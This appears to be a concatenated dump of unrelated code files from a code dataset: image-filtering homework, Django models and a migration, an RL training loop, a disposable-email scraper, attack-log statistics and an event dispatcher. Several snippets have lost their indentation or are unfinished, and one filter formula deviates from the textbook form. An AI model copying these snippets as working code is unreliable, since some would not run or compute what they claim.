rulebook_button = Tk.Button(welcomeFrame, text="Rulebook", command=open_rulebook)
rulebook_button.place(relx=0.5,rely=0.8 , relwidth=0.1,relheight=0.1) # Align up with img
#difficulty = Tk.StringVar(welcomeFrame)
#difficulty.set("Novice")
#difficulty_button = Tk.OptionMenu(welcomeFrame, difficulty, "Novice", "Normal", "Elite", "Legendary")
#difficulty_button.place(relx=0.33,rely=0.67 , relwidth=0.1,relheight=0.08)
#------------------------------Main Program------------------------------------#
root.mainloop()
|
21,913 | b9ea69c65c822047a61bd587f2a2d2e49589715e | import numpy as np
import matplotlib.pyplot as plt
from utils import draw_picture
"""
作业3:
在网上寻找一张福州大学校园图像,并将之转换为灰度图像,完成以下题目:
1编程实现陷波滤波器,对该图进行频率域滤波。
2编程实现巴特沃思低通滤波器,对该图进行图像滤波。
3编程实现理想低通滤波器,对该图进行图像滤波,并分析一下振铃现象。
将程序代码和实验结果图上传。编程语言不限。
https://www.icourse163.org/spoc/learn/FZU-1462424162?tid=1463209447#/learn/content?type=detail&id=1242343011&cid=1265276221
"""
def log_img(image):
    """Log-compress a (possibly complex) spectrum for display: log(1 + |image|)."""
    magnitude = np.abs(image)
    return np.log(magnitude + 1)
class Filter():
    """Frequency-domain filters for a 2-D grayscale image."""
    def __init__(self, img):
        # img: 2-D array (rows, cols); kernel builders use its shape
        self.img = img
    def _notch_kernel(self, d0=1000):
        """
        Ideal notch (band-reject) filter kernel.

        Rejects frequencies near a pair of points placed symmetrically about
        the spectrum centre; passes everything whose squared distance to both
        points is at least d0.
        """
        r, c = self.img.shape
        u0, v0 = 0, c/8
        h = np.empty((r, c, ))
        for u in range(r):
            for v in range(c):
                d1 = (u-r/2-u0)**2 + (v-c/2-v0)**2
                d2 = (u-r/2+u0)**2 + (v-c/2+v0)**2
                # the two rejected points are offset from the centre by (u0, v0)
                h[u, v] = int(min(d1, d2) >= d0)
        return h
    def _butterworth_kernel(self, d0=42):
        """
        Butterworth low-pass filter kernel of order n=2.

        NOTE(review): this computes 1 / (1 + d/d0)**(2n); the textbook BLPF
        is 1 / (1 + (d/d0)**(2n)) — confirm which form is intended.
        """
        r, c = self.img.shape
        n = 2
        h = np.empty((r, c, ))
        k = n<<1
        for u in range(r):
            for v in range(c):
                d = np.sqrt((u - r/2)**2 + (v - c/2)**2)
                # d is the distance from the spectrum centre
                h[u, v] = 1 / (1 + d/d0)**k
        return h
    def _ideal_lowpass_kernel(self, d0=33):
        """
        Ideal low-pass filter kernel: 1 inside radius d0, 0 outside.
        """
        r, c = self.img.shape
        # d0 = 33 (35/36 observed as the visual boundary for this image)
        h = np.empty((r, c, ))
        for u in range(r):
            for v in range(c):
                d = np.sqrt((u - r/2)**2 + (v - c/2)**2)
                # the hard cutoff at radius d0 is what causes ringing
                h[u, v] = int(d <= d0)
        return h
    def run(self, method: str) -> tuple:
        """Apply the kernel named *method* ('notch', 'butterworth',
        'ideal_lowpass') to the image in the frequency domain.

        :return: (f_shift, f_shift_h, img_h) — centred spectrum, filtered
            spectrum, and the filtered image (complex; display via log/abs)
        :raises NotImplementedError: when no matching kernel method exists
        """
        kernel = f'_{method}_kernel'
        if not hasattr(self, kernel):
            raise NotImplementedError('不存在该种滤波器')
        f = np.fft.fft2(self.img)
        f_shift = np.fft.fftshift(f)
        # f_shift_h = f_shift * self._notch_kernel()
        f_shift_h = f_shift * getattr(self, kernel)()
        f_h = np.fft.ifftshift(f_shift_h)
        img_h = np.fft.ifft2(f_h)
        return f_shift, f_shift_h, img_h
    def ringing_effect(self, d0: int):
        """Return (kernel, spatial_response): the ideal low-pass kernel and
        its inverse FFT, which visualises the ringing (sinc-like) response."""
        f_shift_h = self._ideal_lowpass_kernel(d0)
        f_h = np.fft.ifftshift(f_shift_h)
        h = np.fft.ifft2(f_h)
        return f_shift_h, h
def main():
    """Demo driver: load a grayscale image and visualise the ideal-LPF
    ringing effect.  The commented sections run the notch / Butterworth /
    ideal low-pass comparisons and save their figures."""
    img = plt.imread('boy_L.jpg')
    # Filtering is more visible / targeted on the noisy image:
    # img = plt.imread('Fzu_shutong_L.jpg')
    filters = Filter(img)
    # draw = draw_picture(2, 2)
    # plt.figure(figsize=(10, 6))
    # f_shift, f_shift_h, img_h = filters.run('notch')
    # draw(1, img, '原图')
    # draw(2, log_img(f_shift), '频率域')
    # draw(3, log_img(f_shift_h), 'NF滤波后频率域')
    # draw(4, log_img(img_h), 'NF滤波后空间域')
    # plt.savefig('Fzu_shutong_L_notch.jpg')
    # plt.show()
    # plt.figure(figsize=(10, 6))
    # f_shift, f_shift_h, img_h = filters.run('butterworth')
    # draw(1, img, '原图')
    # draw(2, log_img(f_shift), '频率域')
    # draw(3, log_img(f_shift_h), 'BLPF滤波后频率域')
    # draw(4, log_img(img_h), 'BLPF滤波后空间域')
    # plt.savefig('Fzu_shutong_L_butterworth.jpg')
    # plt.show()
    # plt.figure(figsize=(10, 6))
    # f_shift, f_shift_h, img_h = filters.run('ideal_lowpass')
    # draw(1, img, '原图')
    # draw(2, log_img(f_shift), '频率域')
    # draw(3, log_img(f_shift_h), 'ILPF滤波后频率域')
    # draw(4, log_img(img_h), 'ILPF滤波后空间域')
    # plt.savefig('Fzu_shutong_L_ideal_lowpass.jpg')
    # plt.show()
    # d0=3 makes the ringing most pronounced for this image.
    draw = draw_picture(1, 2)
    plt.figure(figsize=(10, 3))
    fh, h = filters.ringing_effect(d0=3)
    draw(1, log_img(fh), '频率域滤波器')
    draw(2, log_img(h), '空间域滤波器')
    # without log_img: TypeError: Image data of dtype complex128 cannot be converted to float
    plt.savefig('boy_L_ringing_effect.jpg')
    plt.show()
if __name__ == "__main__":
main()
"""
振铃现象:
与滤波器H大小、截止频率d0均有关联
当d0较小(个位数)方能观察到,本图片里当d0=3最为明显
振铃现象处理的图片有较大扭曲变形
"""
|
21,914 | 9aa89372d7184f18830188625920656a1b90aa3b | # Generated by Django 2.2.8 on 2020-02-19 14:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0027_remove_client_verification_code_verified'),
]
operations = [
migrations.CreateModel(
name='TempClientUpload',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('salutation', models.CharField(max_length=20)),
('first_name', models.CharField(max_length=50)),
('middle_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('dob', models.CharField(max_length=50)),
('phone_no', models.CharField(max_length=30)),
('relationship', models.CharField(max_length=30)),
('gender', models.CharField(max_length=30)),
('premium', models.CharField(max_length=50)),
('state_id', models.CharField(max_length=150)),
('national_id', models.CharField(max_length=150)),
('passport', models.CharField(max_length=150)),
('staff_id', models.CharField(max_length=150)),
('voter_id', models.CharField(max_length=150)),
('secondary_phone_no', models.CharField(max_length=150)),
('lga', models.CharField(max_length=150)),
('provider', models.CharField(max_length=150)),
],
),
]
|
21,915 | a11c201c74ac4d8b284edc4c25fc7999ace3060a | from setuptools import setup
# Read runtime dependencies from requirements.txt so pip installs and the
# requirements file stay in sync.
with open('requirements.txt') as f:
    requirements = f.read().splitlines()

# Minimal packaging metadata for the dynamicimage package.
setup(
    name='dynamicimage',
    version='0.1',
    install_requires=requirements,
    packages=['dynamicimage'],
    url='',
    license='MIT',
    author='Rick Wu',
    author_email='',
    description=''
)
|
21,916 | 3bd4b7f2179f146ca68e23b0b4d82e24ac9a6085 | n = int(input())
# Read n integers, then a target; collect a pair summing to the target.
# NOTE(review): `lists` shadows nothing critical here but only pairs that
# include the FIRST element are ever considered, and final_list is never
# printed -- the script looks unfinished; confirm intended behaviour.
lists = [int(input()) for x in range(n)]
target = int(input())
first = lists[0]
final_list = []
for i in range(1,len(lists)):
    if first + lists[i] == target:
        final_list.append(first)
        final_list.append(lists[i])
|
21,917 | ce7da2d2f6500f3741003a037e121f9456efc068 |
# coding: utf-8
# In[1]:
import pandas as pd
import matplotlib.pyplot as plt
# Jupyter-notebook export; Python 2 only (print statements, dict.iteritems).
get_ipython().magic(u'matplotlib inline')

data = pd.read_csv('log.csv')
#print list(data.columns.values)
# Keep only the aggregated columns, ordered by time.
# NOTE(review): DataFrame.sort() was removed in pandas 0.20+ -- modern
# pandas needs sort_values('@timestamp').
ss = data[['@timestamp','real_region_name','ip']].sort('@timestamp')

from dateutil import parser
date = parser.parse('2015-03-16T07:36:50.935Z')
# Per-day accumulators: ip_list maps day -> IPs seen that day, unique_ip
# maps day -> cumulative distinct-IP count, att_day maps day -> row count.
ip_list = dict()
ip = 0
ip_list[date] = list()
unique_ip = dict()
uip_set = set()
att_day = dict()
att_c = 0
for x in ss.itertuples():
    if date.day < parser.parse(x[1]).day or date.month < parser.parse(x[1]).month: # day changed
        #print date
        unique_ip[(date)] = len(uip_set)
        att_day[parser.parse("%s-%s"%(date.month,date.day))] = att_c
        att_c = 0
        #print len(uip_set)
        date = parser.parse(x[1])
        ip_list[(date)] = list()
    else:
        att_c = att_c + 1
    if x[3] != ip: # IP changed
        if ip != 0:
            ip_list[date].append(ip)
            uip_set.add(ip)
        ip = x[3]
#    print x[3]

# Flatten the per-day dicts into sortable (day, count) pairs.
attd_lc = [(k, v) for k,v in att_day.iteritems()]
ip_lc = [(k, len(v)) for k,v in ip_list.iteritems()]
uip_lc = [(k, v) for k,v in unique_ip.iteritems()] # cumulative
uip_lc = sorted(uip_lc)
# Differentiate the cumulative unique-IP series into per-day deltas.
uip_lc_delta = list()
for i in range(len(uip_lc)):
    if i != 0:
        delta = uip_lc[i][1] - uip_lc[i-1][1]
        uip_lc_delta.append((uip_lc[i][0],delta))
    else:
        uip_lc_delta.append((uip_lc[i][0], 0))

df = pd.DataFrame(sorted(ip_lc))
df.plot(kind='bar', legend=False, title='# Unique IP per day', alpha=0.5,)
df1 = pd.DataFrame(sorted(uip_lc))
df1.plot(kind='bar', legend=False, title='# Agregate New Unique of IP per day', alpha=0.5,)
df2 = pd.DataFrame(sorted(uip_lc_delta))
df2.plot(kind='bar', legend=False, title='# New of IP per day')
df3 = pd.DataFrame(sorted(attd_lc))
df3.plot(kind='bar', legend=False, title='# Attack per day')
# Normalise both series; 614 and 19 are presumably the maxima of
# attacks/day and new-IPs/day in this dataset -- TODO confirm.
att_uipd = [((x[1]+0.0)/(614+0.0), (y[1]+0.0)/(19+0.0)) for x,y in zip(sorted(attd_lc),sorted(uip_lc_delta))]
df4 = pd.DataFrame(att_uipd)
df4.columns = ['att','uip']
df4.plot( legend=True, title='# Attack vs New IP',alpha=0.5)
plt.show()
#print df4.corr
#print df2
#data[['@timestamp']] = parser.parse(data[['@timestamp']])
# Growth in attacks vs Growth botnet
# IP -- Num of requests
# OS, Browser, Request type, User_agent

# In[7]:

# Growth in attacks vs Growth botnet
# df4.max()
import scipy.stats
# Pearson and Spearman correlation between attacks/day and new IPs/day.
plt.matshow(df4.corr())
print df4['att'].corr(df4['uip'])
print df4['att'].corr(df4['uip'], method='spearman')
# IP -- Num of requests
# OS, Browser, Request type, User_agent

# In[131]:

list(sorted(attd_lc))[:][1]

# In[ ]:
21,918 | 41b34e3ecd9c2f9c1953189feae2eb06bb6b8730 | import numpy as np
from timeit import default_timer as timer
from utils import RefreshScreen
from metrics import Metrics
from time import sleep
# How many console progress updates to emit per run:
# per-episode (outer loop) and per-epoch (inner loop) respectively.
SCREEN_REFRESH_COUNT = 20
SCREEN_REFRESH_COUNT_EPOCHS = 50
def Train(envWrapper, agent, verbose=True, headerText=""):
    """Run agent.maxEpisodes training rollouts against the wrapped env.

    The agent observes, stores each transition and updates its model every
    step.  Returns (list of per-episode Metrics, total wall-clock seconds).
    """
    print(headerText)
    episodicMetrics = []
    globalStart = timer()
    for i in np.arange(agent.maxEpisodes):
        epoch = 0
        frames = []
        done = False
        totalReward = 0
        state = envWrapper.Reset()
        # Console update for progress on # completed rollouts
        if (not verbose) and i % (agent.maxEpisodes / SCREEN_REFRESH_COUNT) == 0:
            # Bug fix: the printed value is labelled '%' but was the raw
            # fraction (0..1); scale by 100 so the label is truthful.
            print(f"------------ {i / agent.maxEpisodes * 100: .2f}% -----------")
        start = timer()
        while not done and epoch < agent.maxEpochs:
            # Observe change in env
            action = agent.GetAction(state)
            nextState, reward, done, _ = envWrapper.Step(action)
            # TODO: [expmt] try spacing these out?
            # Update agent model
            agent.SaveExperience(state=state, action=action, reward=reward, nextState=nextState, done=done)
            agent.Update()
            # Updates related to env
            epoch += 1
            state = nextState
            totalReward += reward
            frames.append({
                'frame': envWrapper.Render(),
                'state': state,
                'action': action,
                'reward': reward})
            # Console update for individual rollout progress
            if verbose and epoch % (agent.maxEpochs / SCREEN_REFRESH_COUNT_EPOCHS) == 0:
                RefreshScreen(mode="human")
                qv = agent.GetValue(state, action)
                print(headerText)
                print(f"Training\ne={i}\nr={np.max(reward): 0.2f}\nq={qv: .2f}")
        metrics = Metrics(frames, epoch, timer() - start, totalReward, done)
        episodicMetrics.append(metrics)
    return episodicMetrics, timer() - globalStart
def Test(envWrapper, agent, verbose=True, headerText=""):
    """Run agent.maxEpisodes greedy evaluation rollouts (no learning).

    Uses GetBestAction and never updates the agent.  Returns
    (list of per-episode Metrics, total wall-clock seconds).
    """
    print(headerText)
    episodicMetrics = []
    globalStart = timer()
    for i in np.arange(agent.maxEpisodes):
        epoch = 0
        totalReward = 0
        frames = []
        done = False
        state = envWrapper.Reset()
        # Console update for progress on # completed rollouts
        if (not verbose) and i % (agent.maxEpisodes / SCREEN_REFRESH_COUNT) == 0:
            # Bug fix: the printed value is labelled '%' but was the raw
            # fraction (0..1); scale by 100 so the label is truthful.
            print(f"------------ {i / agent.maxEpisodes * 100: .2f}% -----------")
        start = timer()
        while not done and epoch < agent.maxEpochs:
            # Observe env and conduct policy
            action = agent.GetBestAction(state)
            nextState, reward, done, _ = envWrapper.Step(action)
            epoch += 1
            state = nextState
            totalReward += reward
            frames.append({
                'frame': envWrapper.Render(),
                'state': state,
                'action': action,
                'reward': reward})
            if verbose and epoch % (agent.maxEpochs / SCREEN_REFRESH_COUNT_EPOCHS) == 0:
                RefreshScreen(mode="human")
                qv = agent.GetValue(state, action)
                print(headerText)
                print(f"Testing\ne={i}\nr={np.max(reward): 0.2f}\nq={qv: .2f}")
        metrics = Metrics(frames, epoch, timer() - start, totalReward, done)
        episodicMetrics.append(metrics)
    return episodicMetrics, timer() - globalStart
|
21,919 | a58a1145c236db31f64625f57cceb9da180e3310 | import requests
from bs4 import BeautifulSoup, Comment
import HTMLParser
class FakeEmailGenerator:
    """Scrapes fakemailgenerator.com for a fresh disposable e-mail address."""

    # Kept for backward compatibility with code reading the class attribute.
    url = None

    def __init__(self, url = None):
        # Bug fix: the original accepted a url argument but ignored it and
        # always used the hard-coded default.
        self.url = url if url is not None else "http://www.fakemailgenerator.com/"

    def doGet(self):
        """GET the generator page; returns the requests.Response."""
        infoResponse = requests.get(self.url)
        return infoResponse

    def getNewEmail(self):
        """Parse the page and return '<local-part>@<domain>' as one string.

        Relies on the page's #home-email input value and #domain element.
        """
        response = self.doGet()
        soup = BeautifulSoup(response.text, "html.parser")
        domain = soup.find(id="domain").text
        email = soup.find(id="home-email")["value"]
        return email.strip() + domain.strip()
if __name__ == "__main__":
    # Demo entry point.  NOTE: Python 2 print statement below -- this
    # module is not Python 3 compatible as written.
    emailGen = FakeEmailGenerator()
    print emailGen.getNewEmail()
|
21,920 | 8adc5d9306f69f158a7ecb44f41320fb43b5a7e0 | from laravel.Foundation.Bus.ShouldQueue import ShouldQueue
from laravel.Foundation.Events.Dispatchable import Dispatchable
import asyncio
class Dispatcher():
    """Event dispatcher: maps event names to listener callables and fires
    them concurrently with asyncio when an event is dispatched."""

    def __init__(self, app):
        self.app = app
        self.queueResolver = None
        # event name -> list of listener callables/coroutines
        self.listeners = {}

    def listen(self, events, listener):
        """Register *listener* for one event name (str) or many (list)."""
        if isinstance(events, str):
            self.__listenOne(events, listener)
        if isinstance(events, list):
            self.__listenMany(events, listener)

    def __listenOne(self, event, listener):
        # setdefault replaces the explicit `event not in ...keys()` check.
        self.listeners.setdefault(event, []).append(self.makeListener(listener))

    def __listenMany(self, events, listener):
        for event in events:
            self.__listenOne(event, listener)

    def makeListener(self, listener):
        """Strings are treated as class names to resolve via the container;
        anything else is assumed to be a ready callable."""
        if isinstance(listener, str):
            return self.createClassListener(listener)
        return listener

    def createClassListener(self, listener):
        from laravel.Helps.Help import app, tap

        async def closure(payload):
            # Resolve the listener class, inject the payload, then either
            # queue it (ShouldQueue) or invoke its handle() directly.
            listenerObj = tap(self.app.make(listener), self.setPayload(payload))
            if isinstance(listenerObj, ShouldQueue):
                return await app('bus').dispatch(listenerObj)
            return await getattr(listenerObj, 'handle')(payload)
        return closure

    def setPayload(self, payload):
        def closure(obj):
            obj.payload = payload
        return closure

    async def dispatch(self, event, parameters=None, returnExceptions=False):
        """Fire *event*; returns (gather awaitable, task list) or None if
        nothing is registered for the event."""
        # Bug fix: the default used to be the mutable literal `{}`, which
        # is shared across every call and can leak state between dispatches
        # if a listener mutates its payload.
        if parameters is None:
            parameters = {}
        eventName, payload = self.parseEventAndPayload(event, parameters)
        if eventName in self.listeners:
            tasks = [asyncio.create_task(self.createCoro(listener, payload)) for listener in self.listeners[eventName]]
            return (asyncio.gather(*tasks, return_exceptions=returnExceptions), tasks)

    async def createCoro(self, listener, payload):
        return await listener(payload)

    def parseEventAndPayload(self, event, parameters):
        """Dispatchable objects carry their own name/payload; otherwise the
        event is a plain name and *parameters* is the payload."""
        if isinstance(event, Dispatchable):
            return (event.eventName, event.payload)
        return (event, parameters)
|
21,921 | 6cbc3275d2c540d742914646e0f687085e4b0b1e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
VERSION = (2, 0, 6)
__version__ = '.'.join(str(num) for num in VERSION)
|
21,922 | d9637ae226f7caf41608d4d0c85390a3ad571535 | from django.shortcuts import render
from django.http import HttpResponse
from .models import Item
from django.template import loader
# Create your views here.
def index(request):
    """Food menu landing page: renders every Item in the database."""
    item_list=Item.objects.all()
    context={
        'item_list':item_list,
    }
    return render(request,'food/index.html',context)
def item(request):
    """Placeholder view returning a static response."""
    return HttpResponse('best up ')
def detail(request, item_id):
    """Render the detail page for a single menu item.

    Raises Item.DoesNotExist for an unknown pk (consider
    get_object_or_404 in a later pass).
    """
    # Bug fix: the context referenced an undefined name `item_b`, so this
    # view raised NameError on every request.  The template key 'item_b'
    # is kept so existing templates keep working.
    item_b = Item.objects.get(pk=item_id)
    context = {
        'item_b': item_b,
    }
    return render(request, 'food/detail.html', context)
|
21,923 | 682d43d9a8700a14744f79e2e719a01a18d84dd8 | #101th prb
# Read two integers; print the last h1 decimal digits of n1 (n1 mod 10**h1).
n1,h1=map(int,input().split(' '))
print(n1%(10**h1))
|
21,924 | db8c083e0f585aed3dcbf879cf3d5c8ba668adb9 | # CTI-110 P2HW1 - Celsius Fahrenheit Converter
# Convert celsius to fahrenheit temperatures
# Lacey Dunn
# 06/11/2018
# ask for input in celsius
celsius=float(input("Enter the temperature in celcius:"))
# convert using formula
fahrenheit=(celsius*9.0/5.0)+32
# print results
print("Degrees in Fahrenheit:", fahrenheit)
|
21,925 | 72246bfd094da21017f7fc40a5900b797e8273fc | from argparse import ArgumentParser
from os import path
import os
import re
from matplotlib.backends.backend_agg import FigureCanvasAgg
from calcsim import CalcSimWrapper
from datastore import InputDatastore
from expercomparison import ComparisonEngine
import numpy as np
import dmplots
aparser = ArgumentParser(description='Searches for the optimum vacancy concentration multiplier')
aparser.add_argument('--inputdata', metavar='DIR', type=str, required=True,
                     help='Directory containing input data')
aparser.add_argument('--outputdir', metavar='DIR', type=str, default='.',
                     help='Directory to stash the output results (plots, tables etc.)')
aparser.add_argument('--dataprefix', metavar='PREFIX', type=str, default='NiCu',
                     help='Prefix to data files')
aparser.add_argument('--temperature', type=float, default=973,
                     help='Temperature in K')
args = aparser.parse_args()

accelcs = CalcSimWrapper()
dstore = InputDatastore(args.inputdata, args.dataprefix)
# Spatial grid: 100 cells over 0..25 (presumably micrometres -- dx below
# divides 25e-6 m by 100); initial condition is a step (1 left, 0 right).
x = np.linspace(0, 25, num=100)
init_cond = np.ones(100)
init_cond[50:] = 0
# Time stepping: 0.05 s steps for a 2-hour simulated duration.
dt = 0.05
ndt = int(2 * 60 * 60 / 0.05)
dx = 25e-6 / 100
def quicksim(z, cvf, I, exper, direction):
    """Run one electromigration simulation and calibrate it against the
    experimental profile *exper*.

    z: effective valence, cvf: vacancy concentration multiplier,
    I: current magnitude, direction: 'forward' or 'reverse' (sets sign).
    Returns (shifted simulated profile, least-squares residual).
    Uses the module-level accelcs/dstore/args/init_cond/ndt/dt/dx.
    """
    ce = ComparisonEngine(accelcs)
    # Sign convention: reverse runs use negative current.
    if direction == 'reverse':
        I = -np.abs(I)
    else:
        I = np.abs(I)
    diffusivity = dstore.interpolated_diffusivity(10001, args.temperature, precise=True)
    resistivity = dstore.interpolated_resistivity(10001, args.temperature)
    # I * 100 * 100 -- presumably A/cm^2 -> A/m^2 conversion; confirm.
    r = accelcs.emigration_factor(z, I * 100 * 100, args.temperature)
    simd = accelcs.calc_simulation(diffusivity, resistivity, init_cond, ndt, dt, dx, r, cvf)
    lsq, shift = ce.calibrate(simd, exper)
    shifted_simd = ce.shift_data(simd)
    return shifted_simd, lsq
def find_nearest(array, value):
    """Return (element, index) of the entry in *array* closest to *value*."""
    pos = np.abs(array - value).argmin()
    return array[pos], pos
#http://stackoverflow.com/questions/4494404/find-large-number-of-consecutive-values-fulfilling-condition-in-a-numpy-array
def contiguous_regions(condition):
    """Find runs of True in the boolean array *condition*.

    Returns a 2-D array whose first column is each run's start index and
    whose second column is its (exclusive) end index.
    """
    # Run boundaries sit where consecutive elements differ.
    edges, = np.diff(condition).nonzero()
    edges = edges + 1  # diff positions are offset by one from the change
    if condition[0]:
        # A run is already open at the very start.
        edges = np.r_[0, edges]
    if condition[-1]:
        # A run is still open at the very end.
        edges = np.r_[edges, condition.size]
    # Pair up (start, end) boundaries.
    return edges.reshape(-1, 2)
#OK, get the data out of outputdir
fresults = {}
rresults = {}
results = {'forward': fresults, 'reverse': rresults}
zrange = np.genfromtxt(path.join(args.outputdir, 'zrange.csv'), delimiter=',')
cvfrange = np.genfromtxt(path.join(args.outputdir, 'cvfrange.csv'), delimiter=',')
files = [path.join(args.outputdir, f) for f in os.listdir(args.outputdir)
         if path.isfile(path.join(args.outputdir, f))]
forwardfiles = [f for f in files if f.endswith('forward.csv')]
reversefiles = [f for f in files if f.endswith('reverse.csv')]
# File names look like 'Searchmap_I<current>_...'; capture the current.
rx = r'.*Searchmap_I([\-0-9\.]+)_.*.csv'
for f in forwardfiles:
    print(str.format('Processing {}', f))
    I = int(float(re.match(rx, f).groups()[0]))
    fresults[I] = np.genfromtxt(f, skip_header=0, delimiter=',')
for f in reversefiles:
    print(str.format('Processing {}', f))
    I = np.abs(int(float(re.match(rx, f).groups()[0])))
    rresults[I] = np.genfromtxt(f, skip_header=0, delimiter=',')
#now, find average z* for forward case
fzaverage = 0
ict = 0
zvalues = []
cresults = {}
#multiply forward/reverse maps to get current-min maps
for I in fresults.keys():
    combined_map = fresults[I] * rresults[I]
    cresults[I] = combined_map
    # I == 0 carries no electromigration information; skip it.
    if I == 0:
        continue
    min_indicies = np.unravel_index(combined_map.argmin(), combined_map.shape)
    min_z = zrange[min_indicies[0]]
    print(str.format('Combined z* for I = {}: {}', I, min_z))
    zvalues.append(min_z)
fzaverage = np.array(zvalues).mean()
print(str.format('Average z*: {}', fzaverage))
# Snap the averaged z* onto the sampled zrange grid.
zaverage_rounded, zaverage_index = find_nearest(zrange, fzaverage)
print(str.format('Rounding to {}', zaverage_rounded))
#find (min, best, max) cvf at zaverage_rounded for each I
cbounds = {}
for I in cresults.keys():
    bounds_column = cresults[I][zaverage_index, :]
    # Threshold the residual map, then take the largest contiguous run of
    # acceptable cvf values as the confidence interval.
    bounds_truth = bounds_column < 0.005
    contig_idxs = contiguous_regions(bounds_truth)
    contig_sizes = contig_idxs[:, 1] - contig_idxs[:, 0]
    contig_largest_idx = contig_sizes.argmax()
    contig_bounds = bounds_column[contig_idxs[contig_largest_idx, 0]: contig_idxs[contig_largest_idx, 1]]
    bounds_min = cvfrange[contig_idxs[contig_largest_idx][0]]
    bounds_max = cvfrange[contig_idxs[contig_largest_idx][1] - 1]
    bounds_best = cvfrange[bounds_column.argmin()]
    # Sanity: the global best must fall inside the chosen interval.
    assert(bounds_column.argmin() >= contig_idxs[contig_largest_idx][0])
    assert(bounds_column.argmin() <= contig_idxs[contig_largest_idx][1])
    print(str.format('I = {}, min, max, best = {}, {}, {}', I, bounds_min, bounds_max, bounds_best))
    # Stored as (lower error, best value, upper error) for the error bars.
    cbounds[I] = bounds_best - bounds_min, bounds_best, bounds_max - bounds_best
#now plot with error bars
I_plot = np.array([b for b in cbounds.keys()])
cvf_plot_list = []
for I in I_plot:
    cvf_plot_list.append(cbounds[I][1])
cvf_plot = np.array(cvf_plot_list)
ebars_list_lower = []
ebars_list_upper = []
for I in I_plot:
    ebars_list_lower.append(cbounds[I][0])
    ebars_list_upper.append(cbounds[I][2])
ebars = np.array([ebars_list_lower, ebars_list_upper])
plot_data = np.column_stack((I_plot, cvf_plot))
outfile = path.join(args.outputdir, 'cvfplot_combined.png')
print(I_plot)
print(ebars)
dmplots.plot_cvf_function_ebars(plot_data, ebars, 'combined', outfile)
#and politely output simulations
for direction in ('forward', 'reverse'):
    for I in cresults.keys():
        for idx, edge in ((0, 'lower'), (1, 'best'), (2, 'upper')):
            outfile = path.join(args.outputdir, str.format('Comparison_I{}_{}_{}bound.png', I, direction, edge))
            cvf = cbounds[I][1]
            if idx == 0:
                cvf -= cbounds[I][idx]
            elif idx == 2:
                cvf += cbounds[I][idx]
            print('using cvf = ' + str(cvf))
            edict = dstore.edict_for_direction(direction)
            exper = dstore.interpolated_experiment_dict(x, edict)[I]
            simd, lsq = quicksim(zaverage_rounded, cvf, I, exper, direction)
            simd = np.column_stack((x, simd))
            exper = np.column_stack((x, exper))
            f = dmplots.plot_sim_fit(simd, exper, I, zaverage_rounded, cvf, direction)
            c = FigureCanvasAgg(f)
            c.print_figure(outfile)
21,926 | dbb9b02dfe74c3a22b4bd133615c2d1dea1dd22d | # Artemtic opertos
#
print("Addition is a :",50+6)
print("subtractio is a :",50-6)
print("50*6 is a :",50*6)
print("50**6 is a :",50**6)
print("50/6 is a :",50/6)
print("50//6 is a :",50//6)
# assignmment Opertors
x=7
print(x)
x%7
print(x)
# Comparsision Operators
#
i=4
print(" Not Equal :",i!=5)
i=40
print(" Less Equal:",i>=50)
i=4
print(" Greater Equal:",i<=5)
i=5
print(" Equal:",i==5)
# membership opertors
list = [2,8,5,8,81,3,5,58,60,60]
print(22 in list)
print(2220 is not list)
# Bitwise opertors
# 0=00
# 1=01
# 2=10
# 3=11
print(0&1)
print(0|1)
|
21,927 | a13b6b81cd9fda39300b57359e0556db29045c90 | # _*_ encoding:utf-8 _*_
from __future__ import unicode_literals
from django.db import models
from datetime import datetime
from clients.models import Clients,District
from commodities.models import FactoryToCommodity,Charge,RelateCharge
# Create your models here.
class Documents_tr(models.Model):
    # One line item of a sales document.  verbose_name strings are Chinese
    # UI labels: 单据号 = document number, 商品 = commodity, 商品价格 = unit
    # price, 数量 = quantity, 销售总价 = sales total, 添加时间 = added time.
    document_id = models.CharField(max_length=30, verbose_name=u"单据号")
    # classify: "sale" (销货) or "return" (退货).
    classify = models.CharField(choices=(("sale", u"销货"), ("return", u"退货")), default="sale", max_length=10)
    merchant = models.ForeignKey(FactoryToCommodity, verbose_name=u"商品",null=True,blank=True)
    charge = models.CharField(max_length=10, verbose_name=u"商品价格")
    sale_nums = models.CharField(max_length=10,verbose_name=u"数量")
    salessums = models.CharField(max_length=10,verbose_name=u"销售总价")
    add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Documents(models.Model):
    # Header record of a sales document (单据).  Chinese labels: 客户 =
    # client, 乡镇 = district/town, 总金额 = total amount, 还款 = repayment,
    # 销售欠款 = amount owed, 备注 = remark, 添加时间 = added time.
    client = models.ForeignKey(Clients,verbose_name=u"客户")
    district = models.ForeignKey(District,default='', verbose_name=u"乡镇")
    document_id = models.CharField(max_length=30,verbose_name=u"单据号")
    money = models.CharField(max_length=10,verbose_name=u"总金额")
    payback = models.CharField(max_length=10,verbose_name=u"还款",null=True,blank=True)
    ownmoney = models.CharField(max_length=10,verbose_name=u"销售欠款",null=True,blank=True)
    remark = models.CharField(max_length=300,default='',verbose_name=u"备注",null=True,blank=True)
    add_time = models.DateField(default=datetime.today, verbose_name=u"添加时间")
    class Meta:
        verbose_name = u"单据"
        verbose_name_plural = verbose_name
|
21,928 | 216b0f667bfbbb3c78263778a1ed7ebe26da55d3 | import pandas as pd
import numpy as np
from get_data import *
from clean_text import *
from tweet_analyser.treatment_algorithms.text_blob_treatement import text_blob_treatement
from tweet_analyser.treatment_algorithms.vader_treatment import vader_treatment
from tweet_analyser.treatment_algorithms.naive_bayes import simple_bayes_treatment
from tweet_analyser.treatment_algorithms.regression_neural_network import regression_neural_network_treatment
from tweet_analyser.graphics.visualize_data import graph_matrice
from tweet_analyser.graphics.ROC import compute_ROC_AUC
from tweet_analyser.graphics.model_score import show_score
# Names of the raw tweet datasets and of the text-cleaning strategies the
# pipeline can be configured with.
datasets_names = ['film_tweets', 'general_tweets', 'brand_tweets']
clean_text_names = ['stop_word_list_light', 'stop_word_list_normal', 'stop_word_list_heavy', 'lemmatize']
def apply_clean_text(df, f):
    """Return a copy of *df* whose Text column has *f* applied to every
    entry; the original frame is left untouched."""
    cleaned = df.copy()
    cleaned.Text = cleaned.Text.apply(f)
    return cleaned
# Sentiment-treatment algorithms available, and the graphics that can be
